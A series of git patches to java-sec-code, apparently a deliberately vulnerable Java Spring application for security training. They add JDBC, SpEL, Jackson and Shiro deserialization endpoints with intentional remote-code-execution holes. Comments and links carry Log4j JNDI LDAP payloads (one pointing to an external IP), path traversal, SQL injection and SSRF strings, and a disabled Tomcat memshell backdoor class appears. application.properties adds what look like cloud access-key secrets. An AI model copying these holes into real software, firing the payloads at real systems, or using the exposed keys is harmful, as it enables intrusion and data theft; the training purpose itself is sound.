-    <orderEntry type="library" name="Maven: org.xmlbeam:xmlprojector:1.4.13" level="project" />
-    <orderEntry type="library" name="Maven: org.postgresql:postgresql:42.3.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.checkerframework:checker-qual:3.5.0" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 8da3449d..e2a62e75 100644
--- a/pom.xml
+++ b/pom.xml
@@ -337,6 +337,13 @@
             <version>42.3.1</version>
         </dependency>
 
+        <!-- jdbc db2 rce -->
+        <dependency>
+            <groupId>com.ibm.db2</groupId>
+            <artifactId>jcc</artifactId>
+            <version>11.5.8.0</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/Jdbc.java b/src/main/java/org/joychou/controller/Jdbc.java
new file mode 100644
index 00000000..79154c1e
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Jdbc.java
@@ -0,0 +1,36 @@
+package org.joychou.controller;
+
+import lombok.extern.slf4j.Slf4j;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import java.sql.DriverManager;
+
+/**
+ * Jdbc Attack @2023.04
+ */
+@Slf4j
+@RestController
+@RequestMapping("/jdbc")
+public class Jdbc {
+
+    /**
+     * <a href="https://github.com/JoyChou93/java-sec-code/wiki/CVE-2022-21724">CVE-2022-21724</a>
+     */
+    @RequestMapping("/postgresql")
+    public void postgresql(String jdbcUrlBase64) throws Exception{
+        byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
+        String jdbcUrl = new String(b);
+        log.info(jdbcUrl);
+        DriverManager.getConnection(jdbcUrl);
+    }
+
+    @RequestMapping("/db2")
+    public void db2(String jdbcUrlBase64) throws Exception{
+        Class.forName("com.ibm.db2.jcc.DB2Driver");
+        byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
+        String jdbcUrl = new String(b);
+        log.info(jdbcUrl);
+        DriverManager.getConnection(jdbcUrl);
+    }
+}
diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java
index ada8a394..e5dbc83a 100644
--- a/src/main/java/org/joychou/controller/Log4j.java
+++ b/src/main/java/org/joychou/controller/Log4j.java
@@ -26,4 +26,9 @@ public String log4j(String token) {
         }
     }
 
+    public static void main(String[] args) {
+        String poc = "${jndi:ldap://127.0.0.1:1389/f616nl}";
+        logger.error(poc);
+    }
+
 }
diff --git a/src/main/java/org/joychou/controller/Rce.java b/src/main/java/org/joychou/controller/Rce.java
index a87a9672..b64d57bf 100644
--- a/src/main/java/org/joychou/controller/Rce.java
+++ b/src/main/java/org/joychou/controller/Rce.java
@@ -58,8 +58,7 @@ public String CommandExec(String cmd) {
 
 
     /**
-     * http://localhost:8080/rce/ProcessBuilder?cmd=whoami
-     * @param cmd cmd
+     * <a href="http://localhost:8080/rce/ProcessBuilder?cmd=whoami">POC</a>
      */
     @GetMapping("/ProcessBuilder")
     public String processBuilder(String cmd) {
@@ -131,16 +130,10 @@ public void groovyshell(String content) {
         groovyShell.evaluate(content);
     }
 
-    /**
-     * <a href="https://github.com/JoyChou93/java-sec-code/wiki/CVE-2022-21724">CVE-2022-21724</a>
-     */
-    @RequestMapping("/postgresql")
-    public void postgresql(String jdbcUrlBase64) throws Exception{
-        byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
-        String jdbcUrl = new String(b);
-        log.info(jdbcUrl);
-        DriverManager.getConnection(jdbcUrl);
-    }
 
+
+    public static void main(String[] args) throws Exception{
+        Runtime.getRuntime().exec("touch /tmp/x");
+    }
 }
 
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 08f3073e..58e90739 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -436,8 +436,8 @@ public interface UserPayload {
             String getUserName();
         }
 
+    public static void main(String[] args) {
 
-    public static void main(String[] args)  {
     }
 
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 71abc91e..c2b3896a 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -188,6 +188,7 @@ public static String host2ip(String host) {
             InetAddress IpAddress = InetAddress.getByName(host);
             return IpAddress.getHostAddress();
         } catch (Exception e) {
+            logger.error("host2ip exception " + e.getMessage());
             return "";
         }
     }
@@ -198,45 +199,57 @@ public static String host2ip(String host) {
      * @return Octal ip returns true, others return false. 012.23.78.233 return true. 012.0x17.78.233 return false.
      */
     public static boolean isOctalIP(String host) {
-        String[] ipParts = host.split("\\.");
-        StringBuilder newDecimalIP = new StringBuilder();
-        boolean is_octal = false;
-
-        // Octal ip only has number and dot character.
-        if (isNumberOrDot(host)) {
-
-            // not support ipv6
-            if (ipParts.length > 4) {
-                throw new SSRFException("Illegal ipv4: " + host);
-            }
-
-            // 01205647351
-            if( ipParts.length == 1 && host.startsWith("0") ) {
-                decimalIp = Integer.valueOf(host, 8).toString();
-                return true;
-            }
+        try{
+            String[] ipParts = host.split("\\.");
+            StringBuilder newDecimalIP = new StringBuilder();
+            boolean is_octal = false;
+
+            // Octal ip only has number and dot character.
+            if (isNumberOrDot(host)) {
+
+                // not support ipv6
+                if (ipParts.length > 4) {
+                    logger.error("Illegal ipv4: " + host);
+                    return false;
+                }
 
-            // 012.23.78.233
-            for(String ip : ipParts) {
-                if (!isNumber(ip)){
-                    throw new SSRFException("Illegal ipv4: " + host);
+                // 01205647351
+                if( ipParts.length == 1 && host.startsWith("0") ) {
+                    decimalIp = Integer.valueOf(host, 8).toString();
+                    return true;
                 }
-                if (ip.startsWith("0")) {
-                    if (Integer.valueOf(ip, 8) >= 256){
-                        throw new SSRFException("Illegal ipv4: " + host);
+
+                // 012.23.78.233
+                for(String ip : ipParts) {
+                    if (!isNumber(ip)){
+                        logger.error("Illegal ipv4: " + host);
+                        return false;
                     }
-                    newDecimalIP.append(Integer.valueOf(ip, 8)).append(".");
-                    is_octal = true;
-                }else{
-                    if (Integer.valueOf(ip, 10) >= 256) {
-                        throw new SSRFException("Illegal ipv4: " + host);
+                    // start with "0", but not "0"
+                    if (ip.startsWith("0") && !ip.equals("0")) {
+                        if (Integer.valueOf(ip, 8) >= 256){
+                            logger.error("Illegal ipv4: " + host);
+                            return false;
+                        }
+                        newDecimalIP.append(Integer.valueOf(ip, 8)).append(".");
+                        is_octal = true;
+                    }else{
+                        if (Integer.valueOf(ip, 10) >= 256) {
+                            logger.error("Illegal ipv4: " + host);
+                            return false;
+                        }
+                        newDecimalIP.append(ip).append(".");
                     }
-                    newDecimalIP.append(ip).append(".");
                 }
+                // delete last char .
+                decimalIp = newDecimalIP.substring(0, newDecimalIP.lastIndexOf("."));
             }
-            decimalIp = newDecimalIP.substring(0, newDecimalIP.lastIndexOf("."));
+            return is_octal;
+        } catch (Exception e){
+            logger.error("SSRFChecker isOctalIP exception: " + e.getMessage());
+            return false;
         }
-        return is_octal;
+
     }
 
     /**
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index d5c6d5ab..66bdb978 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -9,8 +9,6 @@ logging.level.org.joychou.mapper=debug
 
 # Spring Boot Actuator Config
 management.security.enabled=false
-endpoints.enabled=true
-
 
 # logging.config=classpath:logback-online.xml
 
@@ -55,3 +53,6 @@ joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**,
 
 # http header max size
 #server.max-http-header-size=30000
+
+jsc.accessKey.id=LTAI5tSAEPX3Z5N2Yt8ogc2y
+jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7
\ No newline at end of file
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 057aa067..4c116cb3 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -20,6 +20,7 @@
     <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
     <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
     <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
+    <a th:href="@{/env}">actuator env</a>
 </p>
 
 <P>

From 0c253adbed202b0cbef401a375cfb7b2c8a773e1 Mon Sep 17 00:00:00 2001
From: wzqs <71961807+wzqs@users.noreply.github.com>
Date: Wed, 24 May 2023 22:39:44 +0800
Subject: [PATCH 16/20] Update index.html

fix '/rce/exec' path error
---
 src/main/resources/templates/index.html | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 4c116cb3..7e7061be 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -17,7 +17,7 @@
     <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
     <a th:href="@{sqli/mybatis/vuln01?username=joychou' or '1'='1}">SqlInject</a>&nbsp;&nbsp;
     <a th:href="@{/ssrf/urlConnection/vuln?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;
-    <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
+    <a th:href="@{/rce/runtime/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
     <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
     <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
     <a th:href="@{/env}">actuator env</a>
@@ -31,4 +31,4 @@
 <a th:href="@{/logout}">logout</a>
 
 </body>
-</html>
\ No newline at end of file
+</html>

From 920bd93a25730695985ecd1a8c1bda5c738bbdf5 Mon Sep 17 00:00:00 2001
From: JoyChou <root@joychou.org>
Date: Wed, 27 Dec 2023 12:24:23 +0800
Subject: [PATCH 17/20] fix #78

---
 README.md                                     |  1 +
 README_zh.md                                  |  1 +
 java-sec-code.iml                             |  6 ++
 pom.xml                                       | 65 ++++++++++++++++++-
 src/main/java/org/joychou/Application.java    |  1 -
 .../joychou/config/TomcatFilterMemShell.java  | 19 +-----
 .../org/joychou/controller/Deserialize.java   | 14 ++++
 .../org/joychou/controller/FileUpload.java    |  2 +-
 .../java/org/joychou/controller/Jsonp.java    |  3 +-
 src/main/java/org/joychou/controller/Jwt.java |  4 +-
 .../java/org/joychou/controller/Log4j.java    | 17 ++---
 src/main/java/org/joychou/controller/Rce.java |  1 -
 .../java/org/joychou/controller/Shiro.java    | 49 ++++++++++++++
 .../java/org/joychou/controller/SpEL.java     | 50 ++++++++++----
 .../java/org/joychou/controller/Test.java     | 36 ----------
 .../othervulns/xlsxStreamerXXE.java           |  1 -
 .../org/joychou/security/SecurityUtil.java    |  4 +-
 .../java/org/joychou/util/CookieUtils.java    | 13 ++++
 src/main/resources/application.properties     |  3 +-
 src/main/resources/templates/login.html       |  4 +-
 20 files changed, 203 insertions(+), 91 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/Shiro.java
 delete mode 100644 src/main/java/org/joychou/controller/Test.java

diff --git a/README.md b/README.md
index 52642169..e7fbef9e 100644
--- a/README.md
+++ b/README.md
@@ -47,6 +47,7 @@ Sort by letter.
   - ScriptEngine
   - Yaml Deserialize  
   - Groovy
+- [Shiro](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Shiro.java)
 - [Swagger](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/SwaggerConfig.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
diff --git a/README_zh.md b/README_zh.md
index 70e68837..f713e6cc 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -42,6 +42,7 @@ joychou/joychou123
     - ScriptEngine
     - Yaml Deserialize
     - Groovy
+- [Shiro](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Shiro.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 1daccaec..5c58c92b 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -1,5 +1,11 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <module version="4">
+  <component name="AdditionalModuleElements">
+    <content url="file://$MODULE_DIR$" dumb="true">
+      <sourceFolder url="file://$MODULE_DIR$/spring-cloud-gateway-helloworld" isTestSource="false" />
+      <sourceFolder url="file://$MODULE_DIR$/src/main/test" isTestSource="true" />
+    </content>
+  </component>
   <component name="FacetManager">
     <facet type="Spring" name="Spring">
       <configuration />
diff --git a/pom.xml b/pom.xml
index e2a62e75..c62d938c 100644
--- a/pom.xml
+++ b/pom.xml
@@ -12,7 +12,6 @@
     <properties>
         <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
         <maven.compiler.target>1.8</maven.compiler.target>
-        <tomcat.version>8.5.85</tomcat.version>
     </properties>
 
 
@@ -197,11 +196,12 @@
             <version>1.7</version>
         </dependency>
 
-        <!-- rce -->
+
         <dependency>
             <groupId>com.thoughtworks.xstream</groupId>
             <artifactId>xstream</artifactId>
-            <version>1.4.10</version>
+            <!-- For testing, you can use the vulnerable version of 1.4.10. -->
+            <version>1.4.20</version> <!-- use latest version to exploit vuln by using xstream.addPermission-->
         </dependency>
 
         <dependency>
@@ -344,6 +344,65 @@
             <version>11.5.8.0</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.apache.shiro</groupId>
+            <artifactId>shiro-core</artifactId>
+            <version>1.2.4</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.fasterxml.jackson.core</groupId>
+            <artifactId>jackson-databind</artifactId>
+            <version>2.9.8</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.fasterxml.jackson.core</groupId>
+            <artifactId>jackson-annotations</artifactId>
+            <version>2.9.8</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.fasterxml.jackson.core</groupId>
+            <artifactId>jackson-core</artifactId>
+            <version>2.9.8</version>
+        </dependency>
+
+
+        <!-- https://mvnrepository.com/artifact/org.jsecurity/jsecurity -->
+        <dependency>
+            <groupId>org.jsecurity</groupId>
+            <artifactId>jsecurity</artifactId>
+            <version>0.9.0</version>
+        </dependency>
+
+
+        <!-- 为了使用SimpleEvaluationContext，该类需要spring-expression版本大于等于4.3.15 -->
+        <dependency>
+            <groupId>org.springframework</groupId>
+            <artifactId>spring-expression</artifactId>
+            <version>4.3.16.RELEASE</version>
+        </dependency>
+
+        <!-- https://mvnrepository.com/artifact/com.h2database/h2 -->
+        <dependency>
+            <groupId>com.h2database</groupId>
+            <artifactId>h2</artifactId>
+            <version>1.4.199</version>
+            <scope>test</scope>
+        </dependency>
+
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-dbcp</artifactId>
+            <version>9.0.8</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.alibaba</groupId>
+            <artifactId>QLExpress</artifactId>
+            <version>3.3.1</version>
+        </dependency>
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/Application.java b/src/main/java/org/joychou/Application.java
index 41169b9a..afdf6f56 100644
--- a/src/main/java/org/joychou/Application.java
+++ b/src/main/java/org/joychou/Application.java
@@ -5,7 +5,6 @@
 import org.springframework.boot.builder.SpringApplicationBuilder;
 import org.springframework.boot.web.servlet.ServletComponentScan;
 import org.springframework.boot.web.support.SpringBootServletInitializer;
-import org.springframework.cloud.netflix.eureka.EnableEurekaClient;
 
 
 @ServletComponentScan // do filter
diff --git a/src/main/java/org/joychou/config/TomcatFilterMemShell.java b/src/main/java/org/joychou/config/TomcatFilterMemShell.java
index be7a1b1c..15822d59 100644
--- a/src/main/java/org/joychou/config/TomcatFilterMemShell.java
+++ b/src/main/java/org/joychou/config/TomcatFilterMemShell.java
@@ -1,10 +1,5 @@
 package org.joychou.config;
 
-import com.sun.org.apache.xalan.internal.xsltc.DOM;
-import com.sun.org.apache.xalan.internal.xsltc.TransletException;
-import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
-import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
-import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
 import java.lang.reflect.Field;
 import org.apache.catalina.core.StandardContext;
 import java.io.IOException;
@@ -19,8 +14,8 @@
 import javax.servlet.*;
 import java.util.*;
 
-@Component
-public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
+//@Component
+public class TomcatFilterMemShell implements Filter {
     static{
         try {
             System.out.println("Tomcat filter backdoor class is loading...");
@@ -75,16 +70,6 @@ public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
     }
 
 
-    @Override
-    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
-
-    }
-
-    @Override
-    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
-
-    }
-
     @Override
     public void init(FilterConfig filterConfig) throws ServletException {
 
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index 1ca5ff43..55c82ab2 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -1,5 +1,6 @@
 package org.joychou.controller;
 
+import com.fasterxml.jackson.databind.ObjectMapper;
 import org.joychou.config.Constants;
 import org.joychou.security.AntObjectInputStream;
 import org.slf4j.Logger;
@@ -83,4 +84,17 @@ public String rememberMeBlackClassCheck(HttpServletRequest request)
         return "I'm very OK.";
     }
 
+    // String payload = "[\"org.jsecurity.realm.jndi.JndiRealmFactory\", {\"jndiNames\":\"ldap://30.196.97.50:1389/yto8pc\"}]";
+    @RequestMapping("/jackson")
+    public void Jackson(String payload) {
+        ObjectMapper mapper = new ObjectMapper();
+        mapper.enableDefaultTyping();
+        try {
+            Object obj = mapper.readValue(payload, Object.class);
+            mapper.writeValueAsString(obj);
+        } catch (IOException e) {
+            e.printStackTrace();
+        }
+    }
+
 }
diff --git a/src/main/java/org/joychou/controller/FileUpload.java b/src/main/java/org/joychou/controller/FileUpload.java
index 00ab7008..a1858a12 100644
--- a/src/main/java/org/joychou/controller/FileUpload.java
+++ b/src/main/java/org/joychou/controller/FileUpload.java
@@ -195,4 +195,4 @@ private static boolean isImage(File file) throws IOException {
         BufferedImage bi = ImageIO.read(file);
         return bi != null;
     }
-}
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/Jsonp.java b/src/main/java/org/joychou/controller/Jsonp.java
index 2ab0dcef..eb9381e3 100644
--- a/src/main/java/org/joychou/controller/Jsonp.java
+++ b/src/main/java/org/joychou/controller/Jsonp.java
@@ -6,8 +6,8 @@
 import com.alibaba.fastjson.JSONPObject;
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.lang.StringUtils;
-import org.joychou.security.SecurityUtil;
 import org.joychou.util.LoginUtils;
+import org.joychou.security.SecurityUtil;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
@@ -19,7 +19,6 @@
 import org.joychou.util.WebUtils;
 
 import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
 import java.security.Principal;
 
 
diff --git a/src/main/java/org/joychou/controller/Jwt.java b/src/main/java/org/joychou/controller/Jwt.java
index 522fd44a..f3e4c126 100644
--- a/src/main/java/org/joychou/controller/Jwt.java
+++ b/src/main/java/org/joychou/controller/Jwt.java
@@ -33,7 +33,9 @@ public String createToken(HttpServletResponse response, HttpServletRequest reque
         String loginUser = request.getUserPrincipal().getName();
         log.info("Current login user is " + loginUser);
 
-        CookieUtils.deleteCookie(response, COOKIE_NAME);
+        if (!CookieUtils.deleteCookie(response, COOKIE_NAME)){
+            return String.format("%s cookie delete failed", COOKIE_NAME);
+        }
         String token = JwtUtils.generateTokenByJavaJwt(loginUser);
         Cookie cookie = new Cookie(COOKIE_NAME, token);
 
diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java
index e5dbc83a..b2ea4060 100644
--- a/src/main/java/org/joychou/controller/Log4j.java
+++ b/src/main/java/org/joychou/controller/Log4j.java
@@ -2,7 +2,7 @@
 
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
-import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 
 @RestController
@@ -11,23 +11,18 @@ public class Log4j {
     private static final Logger logger = LogManager.getLogger("Log4j");
 
     /**
-     * http://localhost:8080/log4j?token=${jndi:ldap://wffsr5.dnslog.cn:9999}
+     * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75}
      * Default: error/fatal/off
      * Fix: Update log4j to lastet version.
-     * @param token token
      */
-    @GetMapping("/log4j")
+    @RequestMapping(value = "/log4j")
     public String log4j(String token) {
-        if(token.equals("java-sec-code")) {
-            return "java sec code";
-        } else {
-            logger.error(token);
-            return "error";
-        }
+        logger.error(token);
+        return token;
     }
 
     public static void main(String[] args) {
-        String poc = "${jndi:ldap://127.0.0.1:1389/f616nl}";
+        String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}";
         logger.error(poc);
     }
 
diff --git a/src/main/java/org/joychou/controller/Rce.java b/src/main/java/org/joychou/controller/Rce.java
index b64d57bf..7c5f30a9 100644
--- a/src/main/java/org/joychou/controller/Rce.java
+++ b/src/main/java/org/joychou/controller/Rce.java
@@ -15,7 +15,6 @@
 import java.io.BufferedInputStream;
 import java.io.BufferedReader;
 import java.io.InputStreamReader;
-import java.sql.DriverManager;
 
 
 /**
diff --git a/src/main/java/org/joychou/controller/Shiro.java b/src/main/java/org/joychou/controller/Shiro.java
new file mode 100644
index 00000000..2dc143ca
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Shiro.java
@@ -0,0 +1,49 @@
+package org.joychou.controller;
+
+
+import lombok.extern.slf4j.Slf4j;
+import org.apache.shiro.crypto.AesCipherService;
+import org.joychou.config.Constants;
+import org.joychou.util.CookieUtils;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.*;
+import static org.springframework.web.util.WebUtils.getCookie;
+
+@Slf4j
+@RestController
+public class Shiro {
+
+    byte[] KEYS = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
+    private final static String DELETE_ME = "deleteMe";
+    AesCipherService acs = new AesCipherService();
+
+
+    @GetMapping(value = "/shiro/deserialize")
+    public String shiro_deserialize(HttpServletRequest req, HttpServletResponse res) {
+        Cookie cookie = getCookie(req, Constants.REMEMBER_ME_COOKIE);
+        if (null == cookie) {
+            return "No rememberMe cookie. Right?";
+        }
+
+        try {
+            String rememberMe = cookie.getValue();
+            byte[] b64DecodeRememberMe = java.util.Base64.getDecoder().decode(rememberMe);
+            byte[] aesDecrypt = acs.decrypt(b64DecodeRememberMe, KEYS).getBytes();
+            ByteArrayInputStream bytes = new ByteArrayInputStream(aesDecrypt);
+            ObjectInputStream in = new ObjectInputStream(bytes);
+            in.readObject();
+            in.close();
+        } catch (Exception e){
+            if (CookieUtils.addCookie(res, "rememberMe", DELETE_ME)){
+                log.error(e.getMessage());
+                return "RememberMe cookie decrypt error. Set deleteMe cookie success.";
+            }
+        }
+
+        return "Shiro deserialize";
+    }
+}
diff --git a/src/main/java/org/joychou/controller/SpEL.java b/src/main/java/org/joychou/controller/SpEL.java
index 698f4a7e..452180b8 100644
--- a/src/main/java/org/joychou/controller/SpEL.java
+++ b/src/main/java/org/joychou/controller/SpEL.java
@@ -1,38 +1,64 @@
 package org.joychou.controller;
 
+import org.springframework.expression.Expression;
 import org.springframework.expression.ExpressionParser;
+import org.springframework.expression.common.TemplateParserContext;
 import org.springframework.expression.spel.standard.SpelExpressionParser;
-import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.expression.spel.support.SimpleEvaluationContext;
+import org.springframework.expression.spel.support.StandardEvaluationContext;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 
 
 /**
- * SpEL Injection
- *
+ * SpEL Injection.
  * @author JoyChou @2019-01-17
  */
 @RestController
 public class SpEL {
 
     /**
-     * SpEL to RCE
-     * http://localhost:8080/spel/vul/?expression=xxx.
-     * xxx is urlencode(exp)
-     * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
+     * Use Spel to execute cmd. <p>
+     * T(java.lang.Runtime).getRuntime().exec("open -a Calculator")
      */
-    @GetMapping("/spel/vuln")
-    public String rce(String expression) {
+    @RequestMapping("/spel/vuln1")
+    public String spel_vuln1(String value) {
         ExpressionParser parser = new SpelExpressionParser();
-        // fix method: SimpleEvaluationContext
-        return parser.parseExpression(expression).getValue().toString();
+        return parser.parseExpression(value).getValue().toString();
+    }
+
+    /**
+     * Use Spel to execute cmd. <p>
+     * #{T(java.lang.Runtime).getRuntime().exec('open -a Calculator')}
+     * Exploit must add <code>#{}</code> if using TemplateParserContext.
+     */
+    @RequestMapping("spel/vuln2")
+    public String spel_vuln2(String value) {
+        StandardEvaluationContext context = new StandardEvaluationContext();
+        SpelExpressionParser parser = new SpelExpressionParser();
+        Expression expression = parser.parseExpression(value, new TemplateParserContext());
+        Object x = expression.getValue(context);    // trigger vulnerability point
+        return x.toString();   // response
+    }
+
+    /**
+     * Use SimpleEvaluationContext to fix.
+     */
+    @RequestMapping("spel/sec")
+    public String spel_sec(String value) {
+        SimpleEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();
+        SpelExpressionParser parser = new SpelExpressionParser();
+        Expression expression = parser.parseExpression(value, new TemplateParserContext());
+        Object x = expression.getValue(context);
+        return x.toString();
     }
 
     public static void main(String[] args) {
         ExpressionParser parser = new SpelExpressionParser();
-        String expression = "T(java.lang.Runtime).getRuntime().exec(\"open -a Calculator\")";
+        String expression = "1+1";
         String result = parser.parseExpression(expression).getValue().toString();
         System.out.println(result);
     }
+
 }
 
diff --git a/src/main/java/org/joychou/controller/Test.java b/src/main/java/org/joychou/controller/Test.java
deleted file mode 100644
index 3b75c7d0..00000000
--- a/src/main/java/org/joychou/controller/Test.java
+++ /dev/null
@@ -1,36 +0,0 @@
-package org.joychou.controller;
-
-import org.springframework.stereotype.Controller;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
-import org.springframework.web.bind.annotation.RestController;
-
-import javax.servlet.http.Cookie;
-import javax.servlet.http.HttpServletResponse;
-
-@RestController
-@RequestMapping("/test")
-public class Test {
-
-    @RequestMapping(value = "/")
-    public String Index(HttpServletResponse response, String empId) {
-
-        System.out.println(empId);
-        Cookie cookie = new Cookie("XSRF-TOKEN", "123");
-        cookie.setDomain("taobao.com");
-        cookie.setMaxAge(-1); // forever time
-        response.addCookie(cookie);
-        return "success";
-    }
-
-
-    @RequestMapping(value = "/aa")
-    public void test(HttpServletResponse response, String empId) {
-
-        System.out.println(empId);
-        Cookie cookie = new Cookie("XSRF-TOKEN", "123");
-        cookie.setDomain("taobao.com");
-        cookie.setMaxAge(-1); // forever time
-        response.addCookie(cookie);
-    }
-}
diff --git a/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java b/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
index ec054ffd..d3107c3e 100644
--- a/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
+++ b/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
@@ -1,7 +1,6 @@
 package org.joychou.controller.othervulns;
 
 import com.monitorjbl.xlsx.StreamingReader;
-import org.apache.poi.ss.usermodel.Workbook;
 
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.GetMapping;
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index ee962846..fef14593 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -18,7 +18,7 @@
 public class SecurityUtil {
 
     private static final Pattern FILTER_PATTERN = Pattern.compile("^[a-zA-Z0-9_/\\.-]+$");
-    private static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
+    private final static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
 
 
     /**
@@ -116,7 +116,6 @@ public static boolean checkSSRFByWhitehosts(String url) {
 
     /**
      * 解析URL的IP，判断IP是否是内网IP。如果有重定向跳转，循环解析重定向跳转的IP。不建议使用该方案。
-     *
      * 存在的问题：
      *   1、会主动发起请求，可能会有性能问题
      *   2、设置重定向跳转为第一次302不跳转，第二次302跳转到内网IP 即可绕过该防御方案
@@ -134,7 +133,6 @@ public static boolean checkSSRF(String url) {
 
